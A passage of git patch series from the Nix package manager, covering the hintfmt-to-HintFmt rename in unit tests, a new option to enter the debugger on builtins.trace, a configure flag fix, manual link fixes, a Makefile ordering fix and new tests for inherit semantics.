ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.compareVersions")); + HintFmt("expected a string but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.compareVersions")); ASSERT_TRACE2("compareVersions \"abd\" {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), - hintfmt("while evaluating the second argument passed to builtins.compareVersions")); + HintFmt("expected a string but found %s: %s", "a set", Uncolored("{ }")), + HintFmt("while evaluating the second argument passed to builtins.compareVersions")); } @@ -1174,8 +1175,8 @@ namespace nix { TEST_F(ErrorTraceTest, splitVersion) { ASSERT_TRACE2("splitVersion 1", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), - hintfmt("while evaluating the first argument passed to builtins.splitVersion")); + HintFmt("expected a string but found %s: %s", "an 
integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), + HintFmt("while evaluating the first argument passed to builtins.splitVersion")); } @@ -1188,108 +1189,108 @@ namespace nix { TEST_F(ErrorTraceTest, derivationStrict) { ASSERT_TRACE2("derivationStrict \"\"", TypeError, - hintfmt("expected a set but found %s: %s", "a string", "\"\""), - hintfmt("while evaluating the argument passed to builtins.derivationStrict")); + HintFmt("expected a set but found %s: %s", "a string", "\"\""), + HintFmt("while evaluating the argument passed to builtins.derivationStrict")); ASSERT_TRACE2("derivationStrict {}", TypeError, - hintfmt("attribute '%s' missing", "name"), - hintfmt("in the attrset passed as argument to builtins.derivationStrict")); + HintFmt("attribute '%s' missing", "name"), + HintFmt("in the attrset passed as argument to builtins.derivationStrict")); ASSERT_TRACE2("derivationStrict { name = 1; }", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", "1"), - hintfmt("while evaluating the `name` attribute passed to builtins.derivationStrict")); + HintFmt("expected a string but found %s: %s", "an integer", "1"), + HintFmt("while evaluating the `name` attribute passed to builtins.derivationStrict")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; }", TypeError, - hintfmt("required attribute 'builder' missing"), - hintfmt("while evaluating derivation 'foo'")); + HintFmt("required attribute 'builder' missing"), + HintFmt("while evaluating derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; __structuredAttrs = 15; }", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", "15"), - hintfmt("while evaluating the `__structuredAttrs` attribute passed to builtins.derivationStrict")); + HintFmt("expected a Boolean but found %s: %s", "an integer", "15"), + HintFmt("while evaluating the `__structuredAttrs` attribute passed to builtins.derivationStrict")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder 
= 1; __ignoreNulls = 15; }", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", "15"), - hintfmt("while evaluating the `__ignoreNulls` attribute passed to builtins.derivationStrict")); + HintFmt("expected a Boolean but found %s: %s", "an integer", "15"), + HintFmt("while evaluating the `__ignoreNulls` attribute passed to builtins.derivationStrict")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; outputHashMode = 15; }", TypeError, - hintfmt("invalid value '15' for 'outputHashMode' attribute"), - hintfmt("while evaluating the attribute 'outputHashMode' of derivation 'foo'")); + HintFmt("invalid value '15' for 'outputHashMode' attribute"), + HintFmt("while evaluating the attribute 'outputHashMode' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; outputHashMode = \"custom\"; }", TypeError, - hintfmt("invalid value 'custom' for 'outputHashMode' attribute"), - hintfmt("while evaluating the attribute 'outputHashMode' of derivation 'foo'")); + HintFmt("invalid value 'custom' for 'outputHashMode' attribute"), + HintFmt("while evaluating the attribute 'outputHashMode' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = {}; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), - hintfmt("while evaluating the attribute 'system' of derivation 'foo'")); + HintFmt("cannot coerce %s to a string: %s", "a set", "{ }"), + HintFmt("while evaluating the attribute 'system' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = {}; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), - hintfmt("while evaluating the attribute 'outputs' of derivation 'foo'")); + HintFmt("cannot coerce %s to a string: %s", "a set", "{ }"), + HintFmt("while evaluating the attribute 'outputs' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 
1; outputs = \"drv\"; }", TypeError, - hintfmt("invalid derivation output name 'drv'"), - hintfmt("while evaluating the attribute 'outputs' of derivation 'foo'")); + HintFmt("invalid derivation output name 'drv'"), + HintFmt("while evaluating the attribute 'outputs' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = []; }", TypeError, - hintfmt("derivation cannot have an empty set of outputs"), - hintfmt("while evaluating the attribute 'outputs' of derivation 'foo'")); + HintFmt("derivation cannot have an empty set of outputs"), + HintFmt("while evaluating the attribute 'outputs' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = [ \"drv\" ]; }", TypeError, - hintfmt("invalid derivation output name 'drv'"), - hintfmt("while evaluating the attribute 'outputs' of derivation 'foo'")); + HintFmt("invalid derivation output name 'drv'"), + HintFmt("while evaluating the attribute 'outputs' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = [ \"out\" \"out\" ]; }", TypeError, - hintfmt("duplicate derivation output 'out'"), - hintfmt("while evaluating the attribute 'outputs' of derivation 'foo'")); + HintFmt("duplicate derivation output 'out'"), + HintFmt("while evaluating the attribute 'outputs' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; __contentAddressed = \"true\"; }", TypeError, - hintfmt("expected a Boolean but found %s: %s", "a string", "\"true\""), - hintfmt("while evaluating the attribute '__contentAddressed' of derivation 'foo'")); + HintFmt("expected a Boolean but found %s: %s", "a string", "\"true\""), + HintFmt("while evaluating the attribute '__contentAddressed' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; __impure = \"true\"; }", TypeError, - 
hintfmt("expected a Boolean but found %s: %s", "a string", "\"true\""), - hintfmt("while evaluating the attribute '__impure' of derivation 'foo'")); + HintFmt("expected a Boolean but found %s: %s", "a string", "\"true\""), + HintFmt("while evaluating the attribute '__impure' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; __impure = \"true\"; }", TypeError, - hintfmt("expected a Boolean but found %s: %s", "a string", "\"true\""), - hintfmt("while evaluating the attribute '__impure' of derivation 'foo'")); + HintFmt("expected a Boolean but found %s: %s", "a string", "\"true\""), + HintFmt("while evaluating the attribute '__impure' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = \"foo\"; }", TypeError, - hintfmt("expected a list but found %s: %s", "a string", "\"foo\""), - hintfmt("while evaluating the attribute 'args' of derivation 'foo'")); + HintFmt("expected a list but found %s: %s", "a string", "\"foo\""), + HintFmt("while evaluating the attribute 'args' of derivation 'foo'")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = [ {} ]; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), - hintfmt("while evaluating an element of the argument list")); + HintFmt("cannot coerce %s to a string: %s", "a set", "{ }"), + HintFmt("while evaluating an element of the argument list")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; args = [ \"a\" {} ]; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), - hintfmt("while evaluating an element of the argument list")); + HintFmt("cannot coerce %s to a string: %s", "a set", "{ }"), + HintFmt("while evaluating an element of the argument list")); ASSERT_TRACE2("derivationStrict { name = \"foo\"; builder = 1; system = 1; outputs = \"out\"; 
FOO = {}; }", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a set", "{ }"), - hintfmt("while evaluating the attribute 'FOO' of derivation 'foo'")); + HintFmt("cannot coerce %s to a string: %s", "a set", "{ }"), + HintFmt("while evaluating the attribute 'FOO' of derivation 'foo'")); } */ diff --git a/tests/unit/libutil/logging.cc b/tests/unit/libutil/logging.cc index c8c7c091f..1d7304f05 100644 --- a/tests/unit/libutil/logging.cc +++ b/tests/unit/libutil/logging.cc @@ -42,7 +42,7 @@ namespace nix { makeJSONLogger(*logger)->logEI({ .name = "error name", - .msg = hintfmt("this hint has %1% templated %2%!!", + .msg = HintFmt("this hint has %1% templated %2%!!", "yellow", "values"), .errPos = Pos(foFile, problem_file, 02, 13) @@ -62,7 +62,7 @@ namespace nix { throw TestError(e.info()); } catch (Error &e) { ErrorInfo ei = e.info(); - ei.msg = hintfmt("%s; subsequent error message.", Uncolored(e.info().msg.str())); + ei.msg = HintFmt("%s; subsequent error message.", Uncolored(e.info().msg.str())); testing::internal::CaptureStderr(); logger->logEI(ei); @@ -176,7 +176,7 @@ namespace nix { logError({ .name = "error name", - .msg = hintfmt("this hint has %1% templated %2%!!", + .msg = HintFmt("this hint has %1% templated %2%!!", "yellow", "values"), .errPos = Pos(foString, problem_file, 02, 13), @@ -193,7 +193,7 @@ namespace nix { logError({ .name = "error name", - .msg = hintfmt("this hint has %1% templated %2%!!", + .msg = HintFmt("this hint has %1% templated %2%!!", "yellow", "values"), .errPos = Pos(foFile, problem_file, 02, 13) @@ -208,7 +208,7 @@ namespace nix { logError({ .name = "error name", - .msg = hintfmt("hint %1%", "only"), + .msg = HintFmt("hint %1%", "only"), }); auto str = testing::internal::GetCapturedStderr(); @@ -225,7 +225,7 @@ namespace nix { logWarning({ .name = "name", - .msg = hintfmt("there was a %1%", "warning"), + .msg = HintFmt("there was a %1%", "warning"), }); auto str = testing::internal::GetCapturedStderr(); @@ -241,7 +241,7 @@ 
namespace nix { logWarning({ .name = "warning name", - .msg = hintfmt("this hint has %1% templated %2%!!", + .msg = HintFmt("this hint has %1% templated %2%!!", "yellow", "values"), .errPos = Pos(foStdin, problem_file, 2, 13), @@ -264,7 +264,7 @@ namespace nix { auto e = AssertionError(ErrorInfo { .name = "wat", - .msg = hintfmt("it has been %1% days since our last error", "zero"), + .msg = HintFmt("it has been %1% days since our last error", "zero"), .errPos = Pos(foString, problem_file, 2, 13), }); @@ -290,7 +290,7 @@ namespace nix { auto e = AssertionError(ErrorInfo { .name = "wat", - .msg = hintfmt("it has been %1% days since our last error", "zero"), + .msg = HintFmt("it has been %1% days since our last error", "zero"), .errPos = Pos(foString, problem_file, 2, 13), }); @@ -310,39 +310,39 @@ namespace nix { /* ---------------------------------------------------------------------------- - * hintfmt + * HintFmt * --------------------------------------------------------------------------*/ - TEST(hintfmt, percentStringWithoutArgs) { + TEST(HintFmt, percentStringWithoutArgs) { const char *teststr = "this is 100%s correct!"; ASSERT_STREQ( - hintfmt(teststr).str().c_str(), + HintFmt(teststr).str().c_str(), teststr); } - TEST(hintfmt, fmtToHintfmt) { + TEST(HintFmt, fmtToHintfmt) { ASSERT_STREQ( - hintfmt(fmt("the color of this this text is %1%", "not yellow")).str().c_str(), + HintFmt(fmt("the color of this this text is %1%", "not yellow")).str().c_str(), "the color of this this text is not yellow"); } - TEST(hintfmt, tooFewArguments) { + TEST(HintFmt, tooFewArguments) { ASSERT_STREQ( - hintfmt("only one arg %1% %2%", "fulfilled").str().c_str(), + HintFmt("only one arg %1% %2%", "fulfilled").str().c_str(), "only one arg " ANSI_WARNING "fulfilled" ANSI_NORMAL " "); } - TEST(hintfmt, tooManyArguments) { + TEST(HintFmt, tooManyArguments) { ASSERT_STREQ( - hintfmt("what about this %1% %2%", "%3%", "one", "two").str().c_str(), + HintFmt("what about this %1% %2%", "%3%", 
"one", "two").str().c_str(), "what about this " ANSI_WARNING "%3%" ANSI_NORMAL " " ANSI_YELLOW "one" ANSI_NORMAL); } From 8b7eb7400b166b1c2ef45a6d66999041f33c40bf Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 2 Feb 2024 17:41:34 -0800 Subject: [PATCH 428/654] Enter debugger on `builtins.trace` with an option --- src/libexpr/eval-settings.hh | 3 +++ src/libexpr/primops.cc | 4 ++++ 2 files changed, 7 insertions(+) diff --git a/src/libexpr/eval-settings.hh b/src/libexpr/eval-settings.hh index 2f6c12d45..757daebc0 100644 --- a/src/libexpr/eval-settings.hh +++ b/src/libexpr/eval-settings.hh @@ -127,6 +127,9 @@ struct EvalSettings : Config Setting maxCallDepth{this, 10000, "max-call-depth", "The maximum function call depth to allow before erroring."}; + + Setting builtinsTraceDebugger{this, false, "builtins-trace-debugger", + "Whether to enter the debugger on `builtins.trace` calls."}; }; extern EvalSettings evalSettings; diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc index 5e2bbe16f..a24a2d018 100644 --- a/src/libexpr/primops.cc +++ b/src/libexpr/primops.cc @@ -995,6 +995,10 @@ static void prim_trace(EvalState & state, const PosIdx pos, Value * * args, Valu printError("trace: %1%", args[0]->string_view()); else printError("trace: %1%", ValuePrinter(state, *args[0])); + if (evalSettings.builtinsTraceDebugger && state.debugRepl && !state.debugTraces.empty()) { + const DebugTrace & last = state.debugTraces.front(); + state.runDebugRepl(nullptr, last.env, last.expr); + } state.forceValue(*args[1], pos); v = *args[1]; } From 4440eb54e7274734ec442081f55023853efa8708 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 5 Feb 2024 13:03:08 -0800 Subject: [PATCH 429/654] Add release note --- doc/manual/rl-next/debugger-on-trace.md | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 doc/manual/rl-next/debugger-on-trace.md diff --git a/doc/manual/rl-next/debugger-on-trace.md b/doc/manual/rl-next/debugger-on-trace.md new file mode 100644 
index 000000000..d4e55d59c --- /dev/null +++ b/doc/manual/rl-next/debugger-on-trace.md @@ -0,0 +1,9 @@ +--- +synopsis: Enter the `--debugger` when `builtins.trace` is called if `builtins-trace-debugger` is set +prs: 9914 +--- + +If the `builtins-trace-debugger` option is set and `--debugger` is given, +`builtins.trace` calls will behave similarly to `builtins.break` and will enter +the debug REPL. This is useful for determining where warnings are being emitted +from. From 953eb0cba2aad89753a39da6c98d409d1b88f88e Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 8 Feb 2024 15:55:20 -0800 Subject: [PATCH 430/654] Fix tests --- tests/unit/libexpr/error_traces.cc | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index a899d3113..7b32b320b 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -26,7 +26,7 @@ namespace nix { try { state.error("puppy").withTrace(noPos, "doggy").debugThrow(); } catch (Error & e) { - e.addTrace(state.positions[noPos], "beans", ""); + e.addTrace(state.positions[noPos], "beans"); throw; } } catch (BaseError & e) { @@ -52,7 +52,7 @@ namespace nix { try { state.error("beans").debugThrow(); } catch (Error & e2) { - e.addTrace(state.positions[noPos], "beans2", ""); + e.addTrace(state.positions[noPos], "beans2"); //e2.addTrace(state.positions[noPos], "Something", ""); ASSERT_TRUE(e.info().traces.size() == 2); ASSERT_TRUE(e2.info().traces.size() == 0); @@ -807,7 +807,7 @@ namespace nix { ASSERT_TRACE2("genList 1 2", TypeError, HintFmt("expected a function but found %s: %s", "an integer", Uncolored(ANSI_CYAN "1" ANSI_NORMAL)), - HintFmt("while evaluating the first argument passed to builtins.genList", "an integer")); + HintFmt("while evaluating the first argument passed to builtins.genList")); // XXX: defered // ASSERT_TRACE2("genList (x: x + \"foo\") 2 #TODO", From 1fe7b016699c4e2a7435ba29d1ecc6830ae88946 Mon Sep 
17 00:00:00 2001 From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= <7226587+thufschmitt@users.noreply.github.com> Date: Fri, 9 Feb 2024 06:27:24 +0100 Subject: [PATCH 431/654] Don't hardcode the `-O2` compiler flag autoconf authors apparently decided that setting `-O2` by default was a good idea. I disagree, and Nix has its own way of deciding that (with `OPTIMIZE={0,1}`). Explicitly set `CFLAGS` and `CXXFLAGS` in the configure script to disable that behaviour. Fix #9965 --- configure.ac | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/configure.ac b/configure.ac index 8c29c1e62..676b145a5 100644 --- a/configure.ac +++ b/configure.ac @@ -47,6 +47,10 @@ AC_DEFINE_UNQUOTED(SYSTEM, ["$system"], [platform identifier ('cpu-os')]) # State should be stored in /nix/var, unless the user overrides it explicitly. test "$localstatedir" = '${prefix}/var' && localstatedir=/nix/var +# Assign a default value to C{,XX}FLAGS as the default configure script sets them +# to -O2 otherwise, which we don't want to have hardcoded +CFLAGS=${CFLAGS-""} +CXXFLAGS=${CXXFLAGS-""} AC_PROG_CC AC_PROG_CXX From 60045f9c9650ae87f04a2fe507817ad9b5318104 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Fri, 9 Feb 2024 10:41:03 +0100 Subject: [PATCH 432/654] add clickable anchor links how the different invocations relate to each other seems be confusing, which is relatable because one has to wire it up in your head while reading. an explicit reference should make it unambiguous and easier to notice due to links being highlighted. 
--- doc/manual/src/command-ref/nix-collect-garbage.md | 2 +- doc/manual/src/command-ref/nix-env/delete-generations.md | 8 ++++---- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/doc/manual/src/command-ref/nix-collect-garbage.md b/doc/manual/src/command-ref/nix-collect-garbage.md index 3cab79f0e..1bc88d858 100644 --- a/doc/manual/src/command-ref/nix-collect-garbage.md +++ b/doc/manual/src/command-ref/nix-collect-garbage.md @@ -51,7 +51,7 @@ These options are for deleting old [profiles] prior to deleting unreachable [sto - [`--delete-old`](#opt-delete-old) / `-d`\ Delete all old generations of profiles. - This is the equivalent of invoking `nix-env --delete-generations old` on each found profile. + This is the equivalent of invoking [`nix-env --delete-generations old`](@docroot@/command-ref/nix-env/delete-generations.md#generations-old) on each found profile. - [`--delete-older-than`](#opt-delete-older-than) *period*\ Delete all generations of profiles older than the specified amount (except for the generations that were active at that point in time). diff --git a/doc/manual/src/command-ref/nix-env/delete-generations.md b/doc/manual/src/command-ref/nix-env/delete-generations.md index adc6fc219..6b6ea798e 100644 --- a/doc/manual/src/command-ref/nix-env/delete-generations.md +++ b/doc/manual/src/command-ref/nix-env/delete-generations.md @@ -12,13 +12,13 @@ This operation deletes the specified generations of the current profile. *generations* can be a one of the following: -- `...`:\ +- [`...`](#generations-list):\ A list of generation numbers, each one a separate command-line argument. Delete exactly the profile generations given by their generation number. Deleting the current generation is not allowed. -- The special value `old` +- [The special value `old`](#generations-old) Delete all generations except the current one. @@ -30,7 +30,7 @@ This operation deletes the specified generations of the current profile. 
> Because one can roll back to a previous generation, it is possible to have generations newer than the current one. > They will also be deleted. -- `d`:\ +- [`d`](#generations-time):\ The last *number* days *Example*: `30d` @@ -38,7 +38,7 @@ This operation deletes the specified generations of the current profile. Delete all generations created more than *number* days ago, except the most recent one of them. This allows rolling back to generations that were available within the specified period. -- `+`:\ +- [`+`](#generations-count):\ The last *number* generations up to the present *Example*: `+5` From fb5a792280a55bf783528f0903204e674417c70a Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 9 Feb 2024 15:55:24 +0100 Subject: [PATCH 433/654] runPostBuildHook(): Be less chatty Don't spam the user with "running post-build-hook" messages. It's up to the post-build hook if it has something interesting to say. --- src/libstore/build/derivation-goal.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/build/derivation-goal.cc b/src/libstore/build/derivation-goal.cc index d3bbdf1ed..1b326ee13 100644 --- a/src/libstore/build/derivation-goal.cc +++ b/src/libstore/build/derivation-goal.cc @@ -891,7 +891,7 @@ void runPostBuildHook( if (hook == "") return; - Activity act(logger, lvlInfo, actPostBuildHook, + Activity act(logger, lvlTalkative, actPostBuildHook, fmt("running post-build-hook '%s'", settings.postBuildHook), Logger::Fields{store.printStorePath(drvPath)}); PushActivity pact(act.id); From 8f3253c6f4041f500631e1dac5ba75f335e9c70a Mon Sep 17 00:00:00 2001 From: Alois Wohlschlager Date: Fri, 9 Feb 2024 18:56:42 +0100 Subject: [PATCH 434/654] Restore manual pages Commit d536c57e878a04f795c1ef8ee3232a47035da2cf inadvertedly broke build and installation of all non-autogenerated manual pages (in particular, all the ones documenting the stable CLI), by moving the definition of the man-pages variable in doc/manual/local.mk after its usage in 
mk/lib.mk. Move including the former earlier so that the correct order is restored. --- Makefile | 25 ++++++++++++++----------- mk/lib.mk | 4 ++++ 2 files changed, 18 insertions(+), 11 deletions(-) diff --git a/Makefile b/Makefile index 7bbfbddbe..d3542c3e9 100644 --- a/Makefile +++ b/Makefile @@ -47,6 +47,17 @@ makefiles += \ tests/functional/plugins/local.mk endif +# Some makefiles require access to built programs and must be included late. +makefiles-late = + +ifeq ($(ENABLE_DOC_GEN), yes) +makefiles-late += doc/manual/local.mk +endif + +ifeq ($(ENABLE_INTERNAL_API_DOCS), yes) +makefiles-late += doc/internal-api/local.mk +endif + # Miscellaneous global Flags OPTIMIZE = 1 @@ -95,24 +106,16 @@ installcheck: @exit 1 endif -# Documentation or else fallback stub rules. -# -# The documentation makefiles be included after `mk/lib.mk` so rules -# refer to variables defined by `mk/lib.mk`. Rules are not "lazy" like -# variables, unfortunately. +# Documentation fallback stub rules. -ifeq ($(ENABLE_DOC_GEN), yes) -$(eval $(call include-sub-makefile, doc/manual/local.mk)) -else +ifneq ($(ENABLE_DOC_GEN), yes) .PHONY: manual-html manpages manual-html manpages: @echo "Generated docs are disabled. Configure without '--disable-doc-gen', or avoid calling 'make manpages' and 'make manual-html'." @exit 1 endif -ifeq ($(ENABLE_INTERNAL_API_DOCS), yes) -$(eval $(call include-sub-makefile, doc/internal-api/local.mk)) -else +ifneq ($(ENABLE_INTERNAL_API_DOCS), yes) .PHONY: internal-api-html internal-api-html: @echo "Internal API docs are disabled. Configure with '--enable-internal-api-docs', or avoid calling 'make internal-api-html'." diff --git a/mk/lib.mk b/mk/lib.mk index 10ce8d436..fe0add1c9 100644 --- a/mk/lib.mk +++ b/mk/lib.mk @@ -97,6 +97,10 @@ $(foreach test-group, $(install-tests-groups), \ $(eval $(call run-test,$(test),$(install_test_init))) \ $(eval $(test-group).test-group: $(test).test))) +# Include makefiles requiring built programs. 
+$(foreach mf, $(makefiles-late), $(eval $(call include-sub-makefile,$(mf)))) + + $(foreach file, $(man-pages), $(eval $(call install-data-in, $(file), $(mandir)/man$(patsubst .%,%,$(suffix $(file)))))) From 53eecae52546219f3f3e7bebac9792ea5d816ffc Mon Sep 17 00:00:00 2001 From: BOHverkill Date: Sat, 10 Feb 2024 17:17:48 +0100 Subject: [PATCH 435/654] Fix link to derivation in string interpolation doc The reference link definition for it pointing to the glossary was removed, so it is currently not displayed as a link. --- doc/manual/src/language/string-interpolation.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/doc/manual/src/language/string-interpolation.md b/doc/manual/src/language/string-interpolation.md index 6e28d2664..7d81c2020 100644 --- a/doc/manual/src/language/string-interpolation.md +++ b/doc/manual/src/language/string-interpolation.md @@ -20,6 +20,8 @@ Rather than writing (where `freetype` is a [derivation]), you can instead write +[derivation]: ../glossary.md#gloss-derivation + ```nix "--with-freetype2-library=${freetype}/lib" ``` From fae8c15737a8a1df85cc75f55c0bffa712b9ac0a Mon Sep 17 00:00:00 2001 From: BOHverkill Date: Sat, 10 Feb 2024 17:44:33 +0100 Subject: [PATCH 436/654] Fix link to manual in CONTRIBUTING.md --- CONTRIBUTING.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index ffcc0268f..a0c2b16f4 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -63,7 +63,7 @@ Check out the [security policy](https://github.com/NixOS/nix/security/policy). 
- Functional tests – [`tests/functional/**.sh`](./tests/functional) - Unit tests – [`src/*/tests`](./src/) - Integration tests – [`tests/nixos/*`](./tests/nixos) - - [ ] User documentation in the [manual](..doc/manual/src) + - [ ] User documentation in the [manual](./doc/manual/src) - [ ] API documentation in header files - [ ] Code and comments are self-explanatory - [ ] Commit message explains **why** the change was made From f298159a2bac2932208907f6319a0ba80b2721c6 Mon Sep 17 00:00:00 2001 From: nbelakovski Date: Sat, 10 Feb 2024 18:52:39 -0800 Subject: [PATCH 437/654] Add a note about lists values.md There's probably more that can be said, but I thought it might be helpful to put something here about how to access elements of a list for folks coming from more or less any other programming language. If this is rarely used, it might be nice to add to the documentation something about why it's rarely used. --- doc/manual/src/language/values.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/doc/manual/src/language/values.md b/doc/manual/src/language/values.md index aea68a441..99dc0245d 100644 --- a/doc/manual/src/language/values.md +++ b/doc/manual/src/language/values.md @@ -156,6 +156,8 @@ function and the fifth being a set. Note that lists are only lazy in values, and they are strict in length. +Elements in a list can be accessed using `builtins.elemAt`. + ## Attribute Set An attribute set is a collection of name-value-pairs (called *attributes*) enclosed in curly brackets (`{ }`). 
From 4496a4537b56d69c7227088c4174a1ecbedd2ed5 Mon Sep 17 00:00:00 2001 From: nbelakovski Date: Sun, 11 Feb 2024 22:52:49 -0800 Subject: [PATCH 438/654] Update values.md Link to elemAt --- doc/manual/src/language/values.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/manual/src/language/values.md b/doc/manual/src/language/values.md index 99dc0245d..74ffc7070 100644 --- a/doc/manual/src/language/values.md +++ b/doc/manual/src/language/values.md @@ -156,7 +156,7 @@ function and the fifth being a set. Note that lists are only lazy in values, and they are strict in length. -Elements in a list can be accessed using `builtins.elemAt`. +Elements in a list can be accessed using [`builtins.elemAt`](./builtins.md#builtins-elemAt). ## Attribute Set From 8669c02468994887be91072ac58b1ee43380d354 Mon Sep 17 00:00:00 2001 From: pennae Date: Sat, 27 Jan 2024 16:33:34 +0100 Subject: [PATCH 439/654] add test for inherit-from semantics --- tests/functional/lang/eval-okay-inherit-from.err.exp | 2 ++ tests/functional/lang/eval-okay-inherit-from.exp | 1 + tests/functional/lang/eval-okay-inherit-from.nix | 6 ++++++ 3 files changed, 9 insertions(+) create mode 100644 tests/functional/lang/eval-okay-inherit-from.err.exp create mode 100644 tests/functional/lang/eval-okay-inherit-from.exp create mode 100644 tests/functional/lang/eval-okay-inherit-from.nix diff --git a/tests/functional/lang/eval-okay-inherit-from.err.exp b/tests/functional/lang/eval-okay-inherit-from.err.exp new file mode 100644 index 000000000..51881205b --- /dev/null +++ b/tests/functional/lang/eval-okay-inherit-from.err.exp @@ -0,0 +1,2 @@ +trace: used +trace: used diff --git a/tests/functional/lang/eval-okay-inherit-from.exp b/tests/functional/lang/eval-okay-inherit-from.exp new file mode 100644 index 000000000..43bd0e899 --- /dev/null +++ b/tests/functional/lang/eval-okay-inherit-from.exp @@ -0,0 +1 @@ +[ 1 2 { __overrides = { y = { d = [ ]; }; }; c = [ ]; d = 4; x = { c = [ ]; }; y = «repeated»; 
} ] diff --git a/tests/functional/lang/eval-okay-inherit-from.nix b/tests/functional/lang/eval-okay-inherit-from.nix new file mode 100644 index 000000000..d1fad7d69 --- /dev/null +++ b/tests/functional/lang/eval-okay-inherit-from.nix @@ -0,0 +1,6 @@ +let + inherit (builtins.trace "used" { a = 1; b = 2; }) a b; + x.c = 3; + y.d = 4; +in + [ a b rec { x.c = []; inherit (x) c; inherit (y) d; __overrides.y.d = []; } ] From 73065a400d176b21f518c1f4ece90c31318b218d Mon Sep 17 00:00:00 2001 From: pennae Date: Sat, 27 Jan 2024 16:33:34 +0100 Subject: [PATCH 440/654] add test for inherit expr printing --- tests/functional/lang/parse-okay-inherits.exp | 1 + tests/functional/lang/parse-okay-inherits.nix | 9 +++++++++ 2 files changed, 10 insertions(+) create mode 100644 tests/functional/lang/parse-okay-inherits.exp create mode 100644 tests/functional/lang/parse-okay-inherits.nix diff --git a/tests/functional/lang/parse-okay-inherits.exp b/tests/functional/lang/parse-okay-inherits.exp new file mode 100644 index 000000000..050b54afd --- /dev/null +++ b/tests/functional/lang/parse-okay-inherits.exp @@ -0,0 +1 @@ +(let c = { }; b = 2; in { a = 1; inherit b ; d = (c).d; e = (c).e; f = 3; }) diff --git a/tests/functional/lang/parse-okay-inherits.nix b/tests/functional/lang/parse-okay-inherits.nix new file mode 100644 index 000000000..10596c8ad --- /dev/null +++ b/tests/functional/lang/parse-okay-inherits.nix @@ -0,0 +1,9 @@ +let + c = {}; + b = 2; +in { + a = 1; + inherit b; + inherit (c) d e; + f = 3; +} From c66ee57edc6cac3571bfbf77d0c0ea4d25b4e805 Mon Sep 17 00:00:00 2001 From: pennae Date: Sat, 27 Jan 2024 16:33:34 +0100 Subject: [PATCH 441/654] preserve information about whether/how an attribute was inherited --- src/libexpr/eval.cc | 6 +++--- src/libexpr/nixexpr.cc | 8 ++++---- src/libexpr/nixexpr.hh | 17 ++++++++++++++--- src/libexpr/parser-state.hh | 2 +- src/libexpr/parser.y | 11 +++++++++-- 5 files changed, 31 insertions(+), 13 deletions(-) diff --git a/src/libexpr/eval.cc 
